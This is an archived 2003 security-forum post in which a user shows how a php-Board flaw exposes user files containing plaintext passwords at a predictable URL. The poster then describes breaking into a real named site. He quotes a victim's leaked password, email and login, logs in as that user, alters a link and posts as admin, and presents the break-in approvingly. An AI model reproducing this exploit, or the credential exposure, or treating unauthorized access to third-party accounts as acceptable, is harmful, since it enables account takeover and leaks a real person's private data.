php-Board

Full Version: php-Board

GovernmentSecurity.org > The Archives > Exploit Articles

ComSec

May 16 2003, 08:06 PM

here is another sample ...Admin have fixed this problem ... just to show how easy to exploit this issue

QUOTE

php-Board exploit

15/3/2003

by ComSec

just tested a php-Board (php) exploit released Feb 15 2003

details:

http://www.securityfocus.com/archive/1/312...12/2003-02-18/0

exploit:
http://[target]/user/[NICKNAME].txt

Analysis of exploit:

did a search for: /forum/board.php?board=1

and selected as a target http://mitglied.lycos.de/smaragdenstadt/fo...forum/index.php

selected a user http://mitglied.lycos.de/smaragdenstadt/fo.../user/korsi.txt

result:1hoffesten#korsiv@t-online.de#http://www.dvu-pornstars.de#20.08.2002 12:22:30#2##

i assumed::: 1hoffesten....... was the password

so login= korsi
password=1hoffesten

*bingo*

changed his pornsite address

also gave a mention in a thread.....as admin

ComSec

<<<<<<<<<<<<<<<<<<<<<<<<<<<<
¤ ¤ ¥ < Action Deny all > ¥ ¤ ¤
>>>>>>>>>>>>>>>>>>>>>>>>>>>>

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.